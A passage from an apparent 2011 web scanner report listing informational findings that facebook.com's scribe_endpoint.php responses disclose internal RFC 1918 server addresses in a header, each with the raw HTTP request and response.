HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.199.51
X-Cnection: close
Date: Thu, 16 Jun 2011 14:29:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.425. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.147.36

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1502%2C%22baseline_elapsed%22%3A2340%7D&asyncSignal=3462 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34a75172c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.147.36
X-Cnection: close
Date: Thu, 16 Jun 2011 16:28:30 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.426. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.152.34

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1532%2C%22baseline_elapsed%22%3A1511%7D&asyncSignal=4833 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.152.34
X-Cnection: close
Date: Thu, 16 Jun 2011 14:29:31 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.427. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.223.128

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1328%2C%22baseline_elapsed%22%3A1327%7D&asyncSignal=7118 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2724bfef%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.223.128
X-Cnection: close
Date: Thu, 16 Jun 2011 18:17:07 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.428. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.28.40.204

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1399%2C%22baseline_elapsed%22%3A1783%7D&asyncSignal=888 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.28.40.204
X-Cnection: close
Date: Thu, 16 Jun 2011 18:22:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.429. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.126.56

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1953%2C%22baseline_elapsed%22%3A1665%7D&asyncSignal=1239 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.126.56
X-Cnection: close
Date: Thu, 16 Jun 2011 15:36:41 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.430. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.103.31

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1493%2C%22baseline_elapsed%22%3A1493%7D&asyncSignal=9765 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.103.31
X-Cnection: close
Date: Thu, 16 Jun 2011 13:48:12 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.431. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.228.52

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1616%2C%22baseline_elapsed%22%3A1568%7D&asyncSignal=6166 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.228.52
X-Cnection: close
Date: Thu, 16 Jun 2011 15:10:52 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.432. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.101.55

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1501%2C%22baseline_elapsed%22%3A1493%7D&asyncSignal=7084 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.101.55
X-Cnection: close
Date: Thu, 16 Jun 2011 15:21:11 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.433. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.42.40

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1523%2C%22baseline_elapsed%22%3A1507%7D&asyncSignal=3220 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.42.40
X-Cnection: close
Date: Thu, 16 Jun 2011 14:34:41 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.434. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.41.47

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1261%2C%22baseline_elapsed%22%3A1261%7D&asyncSignal=958 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dad6e6%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.41.47
X-Cnection: close
Date: Thu, 16 Jun 2011 16:59:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.435. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.205.121

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1539%2C%22baseline_elapsed%22%3A1639%7D&asyncSignal=9660 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.205.121
X-Cnection: close
Date: Thu, 16 Jun 2011 16:49:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.436. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.177.131

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A708%2C%22baseline_elapsed%22%3A708%7D&asyncSignal=109 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a1fc6948%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.177.131
X-Cnection: close
Date: Thu, 16 Jun 2011 17:25:20 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.437. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.122.79

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1412%2C%22baseline_elapsed%22%3A1405%7D&asyncSignal=7729 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0b8eb68%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.43.122.79
X-Cnection: close
Date: Thu, 16 Jun 2011 14:08:56 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.438. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.133.21

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1485%2C%22baseline_elapsed%22%3A1659%7D&asyncSignal=1300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.43.133.21
X-Cnection: close
Date: Thu, 16 Jun 2011 14:19:12 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.439. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.117.128

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1484%2C%22baseline_elapsed%22%3A1503%7D&asyncSignal=3824 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.117.128
X-Cnection: close
Date: Thu, 16 Jun 2011 14:55:22 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.440. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.3.58

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1332%2C%22baseline_elapsed%22%3A1375%7D&asyncSignal=7169 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df108644%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.3.58
X-Cnection: close
Date: Thu, 16 Jun 2011 12:41:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.441. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.6.113

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1184%2C%22baseline_elapsed%22%3A1202%7D&asyncSignal=5459 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
